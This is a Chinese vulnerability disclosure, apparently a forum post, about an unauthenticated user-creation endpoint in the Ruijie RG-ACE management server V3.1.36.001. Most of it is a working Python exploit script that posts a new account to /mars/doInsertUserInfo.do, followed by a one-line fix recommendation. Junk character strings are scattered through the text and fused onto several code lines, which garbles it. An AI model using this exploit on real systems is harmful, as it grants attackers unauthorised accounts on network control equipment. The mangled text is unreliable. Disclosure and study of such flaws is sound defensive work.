锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
& x- E$ ?! J4 s+ `; m5 v

9 ]5 Y% j( J1 L4 m: d测试的具体版本是
产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
4 W* ?, e7 _7 }; R5 Y9 A: b3 [编译时间: 201104291730
8 a/ L! M7 ]2 [. R4 e

. l, h7 b+ z" M漏洞证明：
4 }5 S' H" w2 D: b7 ~, [


7 h' t1 U4 G4 ?


/ \, p( S0 u2 V$ n4 F4 O执行脚本
#! /usr/bin/env python
#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
5 p+ E2 ~6 }* B" }" x$ l5 d: Topener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
3 _8 C2 O# M5 T4 s6 ]("useractionname","addButtonValue"),
5 u2 |8 y" k1 I) v! F2 V) {("useropermanager","userManager"),
("userName","t"), #######账号自己加
) ]) ^3 ?: Y% T+ t9 Z$ d1 J("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
("email",""),
("mobilePhone",""),
- J+ N0 k* A3 O$ v("officePhone",""),
("addr",""),
! Q/ [# m: F2 v("submit","确定"))
urllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"
- O) ?. z; W1 k2 N% z7 w9 C
" _0 B" ?- v1 I+ [9 s登录，连接设备

; A: _8 |! K' H3 T9 j& i0 C* p5 }
, \7 k% Q$ H9 k6 G- c: n) P, s
5 ^4 _$ ]8 w* W2 u
1 U! \( ?8 h8 {2 F
( Y& A& ~' Z; Y5 C默认的管理员admin权限更大点

6 H2 s7 r  c9 g/ E7 G4 E0 L7 M* @
) p+ h* d9 `/ e; }/ \) D! u
1 {% k/ C! w3 J
5 s$ i9 v, t3 |7 n
修复方案：
加强对接口的权限验证